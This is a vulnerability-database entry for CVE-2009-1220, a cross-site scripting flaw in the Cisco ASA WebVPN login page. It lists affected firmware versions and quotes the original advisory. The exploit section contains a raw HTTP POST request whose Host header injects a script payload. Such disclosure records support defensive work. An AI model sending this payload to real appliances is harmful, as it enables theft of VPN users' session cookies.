Details of VAR-E-200903-0213

ID

VAR-E-200903-0213

CVE

cve_id:

CVE-2009-1220

Trust: 1.9

sources: BID: 34307 // EXPLOIT-DB: 32878 // EDBNET: 54385

EDB ID

32878

TITLE

Cisco ASA Appliance 7.x/8.0 WebVPN - Cross-Site Scripting - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 32878

DESCRIPTION

Cisco ASA Appliance 7.x/8.0 WebVPN - Cross-Site Scripting. CVE-2009-1220CVE-53147 . remote exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 32878

AFFECTED PRODUCTS

vendor:	cisco	model:	asa appliance webvpn	scope:	eq	version:	7.x/8.0	Trust: 1.0
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.0	Trust: 0.6
vendor:	cisco	model:	pix/asa	scope:	eq	version:	8.0	Trust: 0.6
vendor:	cisco	model:	asa series adaptive security appliance	scope:	eq	version:	55007.0	Trust: 0.6
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.2.2	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.0.4.3	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.0.4	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.0.1.4	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	8.0(4)6	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	8.0(4)5	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	8.0(4)28	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	8.0(4)25	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	8.0(4)24	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	8.0(4)22	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	8.0(4)	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	8.0(3)9	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	8.0(3)15	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	8.0(3)14	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	8.0(3)10	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	8.0(3)	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	8.0(2)17	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	8.0(2)	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.2.(2.8)	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.2.(2.7)	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.2.(2.19)	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.2.(2.17)	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.2.(2.16)	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.2(4)9	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.2(4)7	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.2(4)30	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.2(4)27	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.2(4)26	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.2(4)2	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.2(4)16	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.2(4)11	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.2(4)10	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.2(4)	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.2(3)2	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.2(3)006	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.2(2.24)	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.2(2.15)	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.2(2.14)	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.2(2.10)	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.2(2)	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.2(1.22)	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.2(1)	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.2	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.1.(2.49)	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.1.(2.48)	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.1(2.5)	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.1(2.27)	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.1(2)82	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.1(2)78	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.1(2)74	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.1(2)71	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.1(2)70	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.1(2)	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.1(2.55)	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.1	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.0(8)6	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.0(8)3	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.0(8)1	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.0(7)16	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.0(6.7)	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.0(6.33)	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.0(5.2)	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	7.0(5)	Trust: 0.3
vendor:	cisco	model:	pix/asa	scope:	eq	version:	6.0	Trust: 0.3
vendor:	cisco	model:	asa series adaptive security appliance	scope:	eq	version:	55200	Trust: 0.3
vendor:	cisco	model:	asa series adaptive security appliance	scope:	eq	version:	55007.0.4.3	Trust: 0.3
vendor:	cisco	model:	asa series adaptive security appliance	scope:	eq	version:	55007.0.4	Trust: 0.3
vendor:	cisco	model:	asa series adaptive security appliance	scope:	eq	version:	55007.1	Trust: 0.3

sources: BID: 34307 // EXPLOIT-DB: 32878

EXPLOIT

source: https://www.securityfocus.com/bid/34307/info

Cisco ASA is prone to a cross-site scripting vulnerability.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.

Cisco ASA software versions 8.0.4(2B) and prior running on ASA 5500 Series Adaptive Security Appliances are vulnerable.

POST /+webvpn+/index.html HTTP/1.1
Host: "'><script>alert('BugsNotHugs')</script><meta httpequiv=""
content='"www.example.org
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://www.example.com/+webvpn+/index.html
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/1.3 (compatible; MSIE 3.0; Windows 3.11; .NET CLR 1.1.1032)
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: webvpnlogin=1
Content-Length: 66

username=psirt&password=easy&Login=Login&next=&tgroup=&tgcookieset=

Trust: 1.0

sources: EXPLOIT-DB: 32878

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 32878

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 32878

TYPE

Cross-Site Scripting

Trust: 1.0

sources: EXPLOIT-DB: 32878

CREDITS

Bugs NotHugs

Trust: 0.6

sources: EXPLOIT-DB: 32878

EXTERNAL IDS

db:	EXPLOIT-DB	id:	32878	Trust: 1.9
db:	NVD	id:	CVE-2009-1220	Trust: 1.9
db:	BID	id:	34307	Trust: 1.9
db:	EDBNET	id:	54385	Trust: 0.6

sources: BID: 34307 // EXPLOIT-DB: 32878 // EDBNET: 54385

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2009-1220	Trust: 1.6
url:	https://www.securityfocus.com/bid/34307/info	Trust: 1.0
url:	https://www.exploit-db.com/exploits/32878/	Trust: 0.6
url:	https://www.exploit-db.com/exploits/32878	Trust: 0.3
url:	http://tools.cisco.com/security/center/viewalert.x?alertid=17950	Trust: 0.3

sources: BID: 34307 // EXPLOIT-DB: 32878 // EDBNET: 54385

SOURCES

db:	BID	id:	34307
db:	EXPLOIT-DB	id:	32878
db:	EDBNET	id:	54385

LAST UPDATE DATE

2022-07-27T09:50:35.257000+00:00

SOURCES UPDATE DATE

db:

BID

id:

34307

date:

2009-04-24T17:06:00

SOURCES RELEASE DATE

db:	BID	id:	34307	date:	2009-03-31T00:00:00
db:	EXPLOIT-DB	id:	32878	date:	2009-03-31T00:00:00
db:	EDBNET	id:	54385	date:	2009-03-31T00:00:00